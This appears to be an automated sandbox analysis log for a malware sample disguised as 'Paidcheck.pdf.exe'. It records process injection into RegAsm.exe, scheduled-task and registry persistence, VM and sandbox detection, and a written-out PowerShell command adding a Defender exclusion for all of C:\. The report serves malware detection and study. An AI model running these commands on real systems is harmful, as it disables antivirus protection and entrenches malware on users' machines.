      Source: 10.2.RegAsm.exe.400000.0.unpack, u0023u003dqJT4I5hOweIku0024xYFEeDszbikglXCuquUdu0024v9AXtyq2nsu003d.csHigh entropy of concatenated method names: '#=qBeOBlH6CwHFnQdZWWBgZ_pemudZ6CfCVcfOQtgpeG$Y=', '#=q5v5cLSMFBaxiTtOEjscx86gN2ozXlfytiL6UmXnyWtg=', '#=q_XA5h2lVGHLcY9dK754wKGrOjAm6aBbwPxcUJXgJThJUz83kMbCL53G5uuOLP6Rq', '#=qIFfr$DrKqIieRc688$vylAlBsEnx9Z3$TxvrDsPURfM=', '#=qejgvNXJQvgM2GomZsygLjreyguSPQ29pQHqjR_a0dWk=', '#=qCGokdf0OOxeMJLDkXSfc3NPmwygIQ29RjKQWj$wbNGB9C1pPgma_891QiNyTRXcA', '#=qDqyUVyJLXCtYqhZ0$opqkomqhUBn2WCeEEvGAXlNQ$I=', '#=qdImPAY1o3YhbLtukwCQ91cISaeIEWRKSYrGZ3dTVnkY=', '#=qza7O1AHrroJC7yRIJz4wINR_Sgo4hDpQrj_OYfIrlJE=', '#=q6Ct3QmvVLFC7my$dL1uEiHGmXJ5qCuK4WIhDwfhPTFs='
      Source: C:\Users\user\Desktop\Paidcheck.pdf.exe | File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\dwrn\explorerr.exe
      Source: C:\Users\user\Desktop\Paidcheck.pdf.exe | File created: C:\Users\user\AppData\Local\Temp\RegAsm.exe
      Source: C:\Users\user\AppData\Local\Temp\RegAsm.exe | File created: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe

      Boot Survival:

      Creates an undocumented autostart registry key
      Source: C:\Users\user\Desktop\Paidcheck.pdf.exe | Key value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders Startup
      Uses schtasks.exe or at.exe to add and modify task schedules
      Source: C:\Users\user\AppData\Local\Temp\RegAsm.exe | Process created: C:\Windows\SysWOW64\schtasks.exe 'schtasks.exe' /create /f /tn 'DHCP Monitor' /xml 'C:\Users\user\AppData\Local\Temp\tmp4FE3.tmp'
      Source: C:\Users\user\Desktop\Paidcheck.pdf.exe | File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\dwrn
      Source: C:\Users\user\Desktop\Paidcheck.pdf.exe | File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\dwrn\explorerr.exe
      Source: C:\Users\user\Desktop\Paidcheck.pdf.exe | File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\dwrn\explorerr.exe\:Zone.Identifier:$DATA

      Hooking and other Techniques for Hiding and Protection:

      Uses an obfuscated file name to hide its real file extension (double extension)
      Source: Possible double extension: pdf.exe | Static PE information: Paidcheck.pdf.exe
      Source: C:\Users\user\Desktop\Paidcheck.pdf.exe | Registry key monitored for changes: HKEY_CURRENT_USER_Classes
      Source: C:\Users\user\Desktop\Paidcheck.pdf.exe | Process information set: NOOPENFILEERRORBOX (41 identical events)
      Source: C:\Windows\SysWOW64\wscript.exe | Process information set: NOOPENFILEERRORBOX (3 identical events)
      Source: C:\Users\user\AppData\Local\Temp\RegAsm.exe | Process information set: NOOPENFILEERRORBOX (41 identical events)
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX (105 identical events)
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\RegAsm.exe | Process information set: NOOPENFILEERRORBOX
      Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe | Process information set: NOOPENFILEERRORBOX

      Malware Analysis System Evasion:

      Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
      Source: Paidcheck.pdf.exe, 00000000.00000002.306008181.0000000002CD5000.00000004.00000001.sdmp | Binary or memory string: SBIEDLL.DLL0SELECT * FROM WIN32_BIOS8UNEXPECTED WMI QUERY FAILURE
      Source: C:\Users\user\Desktop\Paidcheck.pdf.exe | Thread delayed: delay time: 922337203685477
      Source: C:\Users\user\AppData\Local\Temp\RegAsm.exe | Thread delayed: delay time: 922337203685477
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Thread delayed: delay time: 922337203685477
      Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe | Thread delayed: delay time: 922337203685477
      Source: C:\Windows\SysWOW64\wscript.exe | Window found: window name: WSH-Timer
      Source: C:\Users\user\Desktop\Paidcheck.pdf.exe | Window / User API: threadDelayed 2166
      Source: C:\Users\user\AppData\Local\Temp\RegAsm.exe | Window / User API: threadDelayed 1995
      Source: C:\Users\user\AppData\Local\Temp\RegAsm.exe | Window / User API: threadDelayed 7581
      Source: C:\Users\user\AppData\Local\Temp\RegAsm.exe | Window / User API: foregroundWindowGot 420
      Source: C:\Users\user\AppData\Local\Temp\RegAsm.exe | Window / User API: foregroundWindowGot 504
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Window / User API: threadDelayed 3562
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Window / User API: threadDelayed 3681
      Source: C:\Users\user\Desktop\Paidcheck.pdf.exe TID: 2412 | Thread sleep time: -922337203685477s >= -30000s
      Source: C:\Users\user\AppData\Local\Temp\RegAsm.exe TID: 3360 | Thread sleep time: -21213755684765971s >= -30000s
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 3820 | Thread sleep time: -1844674407370954s >= -30000s
      Source: C:\Users\user\AppData\Local\Temp\RegAsm.exe TID: 5380 | Thread sleep time: -922337203685477s >= -30000s
      Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe TID: 1260 | Thread sleep time: -922337203685477s >= -30000s
      Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe TID: 5900 | Thread sleep time: -922337203685477s >= -30000s
      Source: C:\Windows\System32\conhost.exe | Last function: Thread delayed
      Source: powershell.exe, 0000000B.00000003.399307837.000000000563E000.00000004.00000001.sdmp | Binary or memory string: Hyper-V
      Source: Paidcheck.pdf.exe, 00000000.00000002.306008181.0000000002CD5000.00000004.00000001.sdmp | Binary or memory string: 0VMware|VIRTUAL|A M I|XenDselect * from Win32_ComputerSystem
      Source: Paidcheck.pdf.exe, 00000000.00000002.306008181.0000000002CD5000.00000004.00000001.sdmp | Binary or memory string: vmware
      Source: Paidcheck.pdf.exe | Binary or memory string: 8xtufgFL9YSJTJhKurqTEQ4KHdRlcviru4FUtiXAAUnnOXunjt4Xvipp3nhZtWVo+r+hOi0xK\7O7OCaMW+CuwwYdEahHwAey+MLxaowRjPiaPwgAMJaIMKBGk69eJN8nHBHp8XVGKcVV4PdaO0mGxG/JEAr8ITBz3fEoXnlAkKObYKN\7XyeVNLZvMCiE8ZjgMRtjomvalJwoGzov7OAgrMeTy3CqTWunb/XDcypmS73RJjnzQJxs58+cgWyiqgecHR
      Source: Paidcheck.pdf.exe, 00000000.00000002.306008181.0000000002CD5000.00000004.00000001.sdmp | Binary or memory string: model0Microsoft|VMWare|Virtual
      Source: wscript.exe, 00000009.00000002.307685747.0000000000E23000.00000004.00000020.sdmp | Binary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
      Source: RegAsm.exe, 0000000A.00000002.479021599.0000000000EC2000.00000004.00000020.sdmp | Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
      Source: powershell.exe, 0000000B.00000003.399307837.000000000563E000.00000004.00000001.sdmp | Binary or memory string: l:C:\Windows\system32\WindowsPowerShell\v1.0\Modules\Hyper-V
      Source: C:\Users\user\Desktop\Paidcheck.pdf.exe | Process information queried: ProcessInformation
      Source: C:\Users\user\Desktop\Paidcheck.pdf.exe | Process token adjusted: Debug
      Source: C:\Users\user\AppData\Local\Temp\RegAsm.exe | Process token adjusted: Debug
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process token adjusted: Debug
      Source: C:\Users\user\Desktop\Paidcheck.pdf.exe | Memory allocated: page read and write | page guard

      HIPS / PFW / Operating System Protection Evasion:

      Injects a PE file into a foreign process
      Source: C:\Users\user\Desktop\Paidcheck.pdf.exe | Memory written: C:\Users\user\AppData\Local\Temp\RegAsm.exe base: 400000 value starts with: 4D5A
      Writes to foreign memory regions
      Source: C:\Users\user\Desktop\Paidcheck.pdf.exe | Memory written: C:\Users\user\AppData\Local\Temp\RegAsm.exe base: 400000
      Source: C:\Users\user\Desktop\Paidcheck.pdf.exe | Memory written: C:\Users\user\AppData\Local\Temp\RegAsm.exe base: 402000
      Source: C:\Users\user\Desktop\Paidcheck.pdf.exe | Memory written: C:\Users\user\AppData\Local\Temp\RegAsm.exe base: 420000
      Source: C:\Users\user\Desktop\Paidcheck.pdf.exe | Memory written: C:\Users\user\AppData\Local\Temp\RegAsm.exe base: 422000
      Source: C:\Users\user\Desktop\Paidcheck.pdf.exe | Memory written: C:\Users\user\AppData\Local\Temp\RegAsm.exe base: 829008
      Source: C:\Users\user\Desktop\Paidcheck.pdf.exe | Process created: C:\Windows\SysWOW64\wscript.exe 'C:\Windows\System32\WScript.exe' 'C:\Users\user\AppData\Local\Temp\_Fimmlfqfvyftboxhdsnydr.vbs'
      Source: C:\Users\user\Desktop\Paidcheck.pdf.exe | Process created: C:\Users\user\AppData\Local\Temp\RegAsm.exe C:\Users\user\AppData\Local\Temp\RegAsm.exe
      Source: C:\Windows\SysWOW64\wscript.exe | Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Set-MpPreference -ExclusionPath C:\,'C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\dwrn\explorerr.exe'
      Source: C:\Users\user\AppData\Local\Temp\RegAsm.exe | Process created: C:\Windows\SysWOW64\schtasks.exe 'schtasks.exe' /create /f /tn 'DHCP Monitor' /xml 'C:\Users\user\AppData\Local\Temp\tmp4FE3.tmp'
      Source: C:\Users\user\AppData\Local\Temp\RegAsm.exe | Process created: C:\Windows\SysWOW64\schtasks.exe 'schtasks.exe' /create /f /tn 'DHCP Monitor Task' /xml 'C:\Users\user\AppData\Local\Temp\tmp5C0A.tmp'
      Source: RegAsm.exe, 0000000A.00000002.482649400.0000000002D4A000.00000004.00000001.sdmp | Binary or memory string: Program Manager F
      Source: RegAsm.exe, 0000000A.00000002.485915733.0000000003212000.00000004.00000001.sdmp | Binary or memory string: Program Manager
      Source: RegAsm.exe, 0000000A.00000002.479713175.0000000001460000.00000002.00000001.sdmp | Binary or memory string: Shell_TrayWnd
      Source: RegAsm.exe, 0000000A.00000002.479713175.0000000001460000.00000002.00000001.sdmp | Binary or memory string: Progman
      Source: RegAsm.exe, 0000000A.00000002.489937133.0000000006CBB000.00000004.00000001.sdmp | Binary or memory string: Program Managerram Manager
      Source: RegAsm.exe, 0000000A.00000002.479713175.0000000001460000.00000002.00000001.sdmp | Binary or memory string: Progmanlock
      Source: RegAsm.exe, 0000000A.00000002.488221357.00000000060BD000.00000004.00000001.sdmp | Binary or memory string: Program Managerram Manager
      Source: RegAsm.exe, 0000000A.00000002.490208871.0000000006FEC000.00000004.00000001.sdmp | Binary or memory string: Program Manager
      Source: C:\Users\user\Desktop\Paidcheck.pdf.exe | Queries volume information: C:\Users\user\Desktop\Paidcheck.pdf.exe VolumeInformation
      Source: C:\Users\user\Desktop\Paidcheck.pdf.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
      Source: C:\Users\user\Desktop\Paidcheck.pdf.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
      Source: C:\Users\user\Desktop\Paidcheck.pdf.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation
      Source: C:\Users\user\Desktop\Paidcheck.pdf.exe | Queries volume information: C:\Windows\Fonts\arial.ttf VolumeInformation
      Source: C:\Users\user\Desktop\Paidcheck.pdf.exe | Queries volume information: C:\Windows\Fonts\ariali.ttf VolumeInformation
      Source: C:\Users\user\Desktop\Paidcheck.pdf.exe | Queries volume information: C:\Windows\Fonts\arialbd.ttf VolumeInformation
      Source: C:\Users\user\Desktop\Paidcheck.pdf.exe | Queries volume information: C:\Windows\Fonts\arialbi.ttf VolumeInformation
      Source: C:\Users\user\Desktop\Paidcheck.pdf.exe | Queries volume information: C:\Windows\Fonts\ARIALN.TTF VolumeInformation
      Source: C:\Users\user\Desktop\Paidcheck.pdf.exe | Queries volume information: C:\Windows\Fonts\ariblk.ttf VolumeInformation
      Source: C:\Users\user\Desktop\Paidcheck.pdf.exe | Queries volume information: C:\Windows\Fonts\ARIALNI.TTF VolumeInformation
      Source: C:\Users\user\Desktop\Paidcheck.pdf.exe | Queries volume information: C:\Windows\Fonts\ARIALNB.TTF VolumeInformation
      Source: C:\Users\user\Desktop\Paidcheck.pdf.exe | Queries volume information: C:\Windows\Fonts\ARIALNBI.TTF VolumeInformation
      Source: C:\Users\user\Desktop\Paidcheck.pdf.exe | Queries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformation
      Source: C:\Users\user\Desktop\Paidcheck.pdf.exe | Queries volume information: C:\Windows\Fonts\calibri.ttf VolumeInformation
      Source: C:\Users\user\Desktop\Paidcheck.pdf.exe | Queries volume information: C:\Windows\Fonts\calibril.ttf VolumeInformation
      Source: C:\Users\user\Desktop\Paidcheck.pdf.exe | Queries volume information: C:\Windows\Fonts\calibrii.ttf VolumeInformation
      Source: C:\Users\user\Desktop\Paidcheck.pdf.exe | Queries volume information: C:\Windows\Fonts\calibrili.ttf VolumeInformation
      Source: C:\Users\user\Desktop\Paidcheck.pdf.exe | Queries volume information: C:\Windows\Fonts\calibrib.ttf VolumeInformation
      Source: C:\Users\user\Desktop\Paidcheck.pdf.exe | Queries volume information: C:\Windows\Fonts\calibriz.ttf VolumeInformation
      Source: C:\Users\user\Desktop\Paidcheck.pdf.exe | Queries volume information: C:\Windows\Fonts\cambria.ttc VolumeInformation
      Source: C:\Users\user\Desktop\Paidcheck.pdf.exe | Queries volume information: C:\Windows\Fonts\cambriai.ttf VolumeInformation
      Source: C:\Users\user\Desktop\Paidcheck.pdf.exe | Queries volume information: C:\Windows\Fonts\cambriab.ttf VolumeInformation
      Source: C:\Users\user\Desktop\Paidcheck.pdf.exe | Queries volume information: C:\Windows\Fonts\cambriaz.ttf VolumeInformation
      Source: C:\Users\user\Desktop\Paidcheck.pdf.exe | Queries volume information: C:\Windows\Fonts\Candara.ttf VolumeInformation
      Source: C:\Users\user\Desktop\Paidcheck.pdf.exe | Queries volume information: C:\Windows\Fonts\Candarai.ttf VolumeInformation
      Source: C:\Users\user\Desktop\Paidcheck.pdf.exe | Queries volume information: C:\Windows\Fonts\Candarab.ttf VolumeInformation
      Source: C:\Users\user\Desktop\Paidcheck.pdf.exe | Queries volume information: C:\Windows\Fonts\Candaraz.ttf VolumeInformation
      Source: C:\Users\user\Desktop\Paidcheck.pdf.exe | Queries volume information: C:\Windows\Fonts\comic.ttf VolumeInformation
      Source: C:\Users\user\Desktop\Paidcheck.pdf.exe | Queries volume information: C:\Windows\Fonts\comici.ttf VolumeInformation
      Source: C:\Users\user\Desktop\Paidcheck.pdf.exe | Queries volume information: C:\Windows\Fonts\comicbd.ttf VolumeInformation
      Source: C:\Users\user\Desktop\Paidcheck.pdf.exe | Queries volume information: C:\Windows\Fonts\comicz.ttf VolumeInformation
      Source: C:\Users\user\Desktop\Paidcheck.pdf.exe | Queries volume information: C:\Windows\Fonts\consola.ttf VolumeInformation
      Source: C:\Users\user\Desktop\Paidcheck.pdf.exe | Queries volume information: C:\Windows\Fonts\consolai.ttf VolumeInformation
      Source: C:\Users\user\Desktop\Paidcheck.pdf.exe | Queries volume information: C:\Windows\Fonts\consolab.ttf VolumeInformation
      Source: C:\Users\user\Desktop\Paidcheck.pdf.exe | Queries volume information: C:\Windows\Fonts\consolaz.ttf VolumeInformation
      Source: C:\Users\user\Desktop\Paidcheck.pdf.exe | Queries volume information: C:\Windows\Fonts\constan.ttf VolumeInformation
      Source: C:\Users\user\Desktop\Paidcheck.pdf.exe | Queries volume information: C:\Windows\Fonts\constani.ttf VolumeInformation
      Source: C:\Users\user\Desktop\Paidcheck.pdf.exe | Queries volume information: C:\Windows\Fonts\constanb.ttf VolumeInformation
      Source: C:\Users\user\Desktop\Paidcheck.pdf.exe | Queries volume information: C:\Windows\Fonts\constanz.ttf VolumeInformation
      Source: C:\Users\user\Desktop\Paidcheck.pdf.exe | Queries volume information: C:\Windows\Fonts\corbel.ttf VolumeInformation
      Source: C:\Users\user\Desktop\Paidcheck.pdf.exe | Queries volume information: C:\Windows\Fonts\corbeli.ttf VolumeInformation
      Source: C:\Users\user\Desktop\Paidcheck.pdf.exe | Queries volume information: C:\Windows\Fonts\corbelb.ttf VolumeInformation
      Source: C:\Users\user\Desktop\Paidcheck.pdf.exe | Queries volume information: C:\Windows\Fonts\corbelz.ttf VolumeInformation
      Source: C:\Users\user\Desktop\Paidcheck.pdf.exe | Queries volume information: C:\Windows\Fonts\cour.ttf VolumeInformation
      Source: C:\Users\user\Desktop\Paidcheck.pdf.exe | Queries volume information: C:\Windows\Fonts\couri.ttf VolumeInformation
      Source: C:\Users\user\Desktop\Paidcheck.pdf.exe | Queries volume information: C:\Windows\Fonts\courbd.ttf VolumeInformation
      Source: C:\Users\user\Desktop\Paidcheck.pdf.exe | Queries volume information: C:\Windows\Fonts\courbi.ttf VolumeInformation
      Source: C:\Users\user\Desktop\Paidcheck.pdf.exe | Queries volume information: C:\Windows\Fonts\ebrima.ttf VolumeInformation
      Source: C:\Users\user\Desktop\Paidcheck.pdf.exe | Queries volume information: C:\Windows\Fonts\ebrimabd.ttf VolumeInformation
      Source: C:\Users\user\Desktop\Paidcheck.pdf.exe | Queries volume information: C:\Windows\Fonts\framd.ttf VolumeInformation
      Source: C:\Users\user\Desktop\Paidcheck.pdf.exe | Queries volume information: C:\Windows\Fonts\FRADM.TTF VolumeInformation
      Source: C:\Users\user\Desktop\Paidcheck.pdf.exe | Queries volume information: C:\Windows\Fonts\framdit.ttf VolumeInformation
      Source: C:\Users\user\Desktop\Paidcheck.pdf.exe | Queries volume information: C:\Windows\Fonts\FRADMIT.TTF VolumeInformation
      Source: C:\Users\user\Desktop\Paidcheck.pdf.exe | Queries volume information: C:\Windows\Fonts\FRAMDCN.TTF VolumeInformation
      Source: C:\Users\user\Desktop\Paidcheck.pdf.exe | Queries volume information: C:\Windows\Fonts\FRADMCN.TTF VolumeInformation
      Source: C:\Users\user\Desktop\Paidcheck.pdf.exe | Queries volume information: C:\Windows\Fonts\FRAHV.TTF VolumeInformation
      Source: C:\Users\user\Desktop\Paidcheck.pdf.exe | Queries volume information: C:\Windows\Fonts\FRAHVIT.TTF VolumeInformation
      Source: C:\Users\user\Desktop\Paidcheck.pdf.exe | Queries volume information: C:\Windows\Fonts\Gabriola.ttf VolumeInformation
      Source: C:\Users\user\Desktop\Paidcheck.pdf.exe | Queries volume information: C:\Windows\Fonts\gadugi.ttf VolumeInformation
      Source: C:\Users\user\Desktop\Paidcheck.pdf.exe | Queries volume information: C:\Windows\Fonts\gadugib.ttf VolumeInformation
      Source: C:\Users\user\Desktop\Paidcheck.pdf.exe | Queries volume information: C:\Windows\Fonts\georgia.ttf VolumeInformation
      Source: C:\Users\user\Desktop\Paidcheck.pdf.exe | Queries volume information: C:\Windows\Fonts\georgiai.ttf VolumeInformation
      Source: C:\Users\user\Desktop\Paidcheck.pdf.exe | Queries volume information: C:\Windows\Fonts\georgiab.ttf VolumeInformation
      Source: C:\Users\user\Desktop\Paidcheck.pdf.exe | Queries volume information: C:\Windows\Fonts\georgiaz.ttf VolumeInformation
      Source: C:\Users\user\Desktop\Paidcheck.pdf.exe | Queries volume information: C:\Windows\Fonts\impact.ttf VolumeInformation
      Source: C:\Users\user\Desktop\Paidcheck.pdf.exe | Queries volume information: C:\Windows\Fonts\Inkfree.ttf VolumeInformation
      Source: C:\Users\user\Desktop\Paidcheck.pdf.exe | Queries volume information: C:\Windows\Fonts\javatext.ttf VolumeInformation
      Source: C:\Users\user\Desktop\Paidcheck.pdf.exe | Queries volume information: C:\Windows\Fonts\LeelawUI.ttf VolumeInformation
      Source: C:\Users\user\Desktop\Paidcheck.pdf.exe | Queries volume information: C:\Windows\Fonts\LeelUIsl.ttf VolumeInformation
      Source: C:\Users\user\Desktop\Paidcheck.pdf.exe | Queries volume information: C:\Windows\Fonts\LeelaUIb.ttf VolumeInformation
      Source: C:\Users\user\Desktop\Paidcheck.pdf.exe | Queries volume information: C:\Windows\Fonts\lucon.ttf VolumeInformation
      Source: C:\Users\user\Desktop\Paidcheck.pdf.exe | Queries volume information: C:\Windows\Fonts\l_10646.ttf VolumeInformation
      Source: C:\Users\user\Desktop\Paidcheck.pdf.exe | Queries volume information: C:\Windows\Fonts\malgun.ttf VolumeInformation
      Source: C:\Users\user\Desktop\Paidcheck.pdf.exe | Queries volume information: C:\Windows\Fonts\malgunsl.ttf VolumeInformation
      Source: C:\Users\user\Desktop\Paidcheck.pdf.exe | Queries volume information: C:\Windows\Fonts\malgunbd.ttf VolumeInformation
      Source: C:\Users\user\Desktop\Paidcheck.pdf.exe | Queries volume information: C:\Windows\Fonts\himalaya.ttf VolumeInformation
      Source: C:\Users\user\Desktop\Paidcheck.pdf.exe | Queries volume information: C:\Windows\Fonts\msjh.ttc VolumeInformation
      Source: C:\Users\user\Desktop\Paidcheck.pdf.exe | Queries volume information: C:\Windows\Fonts\msjhl.ttc VolumeInformation
      Source: C:\Users\user\Desktop\Paidcheck.pdf.exe | Queries volume information: C:\Windows\Fonts\msjhbd.ttc VolumeInformation
      Source: C:\Users\user\Desktop\Paidcheck.pdf.exe | Queries volume information: C:\Windows\Fonts\ntailu.ttf VolumeInformation
      Source: C:\Users\user\Desktop\Paidcheck.pdf.exe | Queries volume information: C:\Windows\Fonts\ntailub.ttf VolumeInformation
      Source: C:\Users\user\Desktop\Paidcheck.pdf.exe | Queries volume information: C:\Windows\Fonts\phagspa.ttf VolumeInformation
      Source: C:\Users\user\Desktop\Paidcheck.pdf.exe | Queries volume information: C:\Windows\Fonts\phagspab.ttf VolumeInformation
      Source: C:\Users\user\Desktop\Paidcheck.pdf.exe | Queries volume information: C:\Windows\Fonts\micross.ttf VolumeInformation
      Source: C:\Users\user\Desktop\Paidcheck.pdf.exe | Queries volume information: C:\Windows\Fonts\taile.ttf VolumeInformation
      Source: C:\Users\user\Desktop\Paidcheck.pdf.exe | Queries volume information: C:\Windows\Fonts\taileb.ttf VolumeInformation
      Source: C:\Users\user\Desktop\Paidcheck.pdf.exe | Queries volume information: C:\Windows\Fonts\msyh.ttc VolumeInformation
      Source: C:\Users\user\Desktop\Paidcheck.pdf.exe | Queries volume information: C:\Windows\Fonts\msyhl.ttc VolumeInformation
      Source: C:\Users\user\Desktop\Paidcheck.pdf.exe | Queries volume information: C:\Windows\Fonts\msyhbd.ttc VolumeInformation
      Source: C:\Users\user\Desktop\Paidcheck.pdf.exe | Queries volume information: C:\Windows\Fonts\msyi.ttf VolumeInformation
      Source: C:\Users\user\Desktop\Paidcheck.pdf.exe | Queries volume information: C:\Windows\Fonts\mingliub.ttc VolumeInformation
      Source: C:\Users\user\Desktop\Paidcheck.pdf.exe | Queries volume information: C:\Windows\Fonts\monbaiti.ttf VolumeInformation
      Source: C:\Users\user\Desktop\Paidcheck.pdf.exe | Queries volume information: C:\Windows\Fonts\msgothic.ttc VolumeInformation
      Source: C:\Users\user\Desktop\Paidcheck.pdf.exe | Queries volume information: C:\Windows\Fonts\mvboli.ttf VolumeInformation
      Source: C:\Users\user\Desktop\Paidcheck.pdf.exe | Queries volume information: C:\Windows\Fonts\mmrtext.ttf VolumeInformation
      Source: C:\Users\user\Desktop\Paidcheck.pdf.exe | Queries volume information: C:\Windows\Fonts\mmrtextb.ttf VolumeInformation
      Source: C:\Users\user\Desktop\Paidcheck.pdf.exe | Queries volume information: C:\Windows\Fonts\Nirmala.ttf VolumeInformation
      Source: C:\Users\user\Desktop\Paidcheck.pdf.exe | Queries volume information: C:\Windows\Fonts\NirmalaS.ttf VolumeInformation
      Source: C:\Users\user\Desktop\Paidcheck.pdf.exe | Queries volume information: C:\Windows\Fonts\NirmalaB.ttf VolumeInformation
      Source: C:\Users\user\Desktop\Paidcheck.pdf.exe | Queries volume information: C:\Windows\Fonts\pala.ttf VolumeInformation
      Source: C:\Users\user\Desktop\Paidcheck.pdf.exe | Queries volume information: C:\Windows\Fonts\palai.ttf VolumeInformation
      Source: C:\Users\user\Desktop\Paidcheck.pdf.exe | Queries volume information: C:\Windows\Fonts\palab.ttf VolumeInformation
      Source: C:\Users\user\Desktop\Paidcheck.pdf.exe | Queries volume information: C:\Windows\Fonts\palabi.ttf VolumeInformation
      Source: C:\Users\user\Desktop\Paidcheck.pdf.exe | Queries volume information: C:\Windows\Fonts\segoepr.ttf VolumeInformation
      Source: C:\Users\user\Desktop\Paidcheck.pdf.exe | Queries volume information: C:\Windows\Fonts\segoeprb.ttf VolumeInformation
      Source: C:\Users\user\Desktop\Paidcheck.pdf.exe | Queries volume information: C:\Windows\Fonts\segoesc.ttf VolumeInformation
      Source: C:\Users\user\Desktop\Paidcheck.pdf.exe | Queries volume information: C:\Windows\Fonts\segoescb.ttf VolumeInformation
      Source: C:\Users\user\Desktop\Paidcheck.pdf.exe | Queries volume information: C:\Windows\Fonts\segoeuii.ttf VolumeInformation
      Source: C:\Users\user\Desktop\Paidcheck.pdf.exe | Queries volume information: C:\Windows\Fonts\seguisli.ttf VolumeInformation
      Source: C:\Users\user\Desktop\Paidcheck.pdf.exe | Queries volume information: C:\Windows\Fonts\seguili.ttf VolumeInformation
      Source: C:\Users\user\Desktop\Paidcheck.pdf.exe | Queries volume information: C:\Windows\Fonts\seguisbi.ttf VolumeInformation
      Source: C:\Users\user\Desktop\Paidcheck.pdf.exe | Queries volume information: C:\Windows\Fonts\segoeuiz.ttf VolumeInformation
      Source: C:\Users\user\Desktop\Paidcheck.pdf.exe | Queries volume information: C:\Windows\Fonts\seguibl.ttf VolumeInformation
      Source: C:\Users\user\Desktop\Paidcheck.pdf.exe | Queries volume information: C:\Windows\Fonts\seguibli.ttf VolumeInformation
      Source: C:\Users\user\Desktop\Paidcheck.pdf.exe | Queries volume information: C:\Windows\Fonts\seguiemj.ttf VolumeInformation
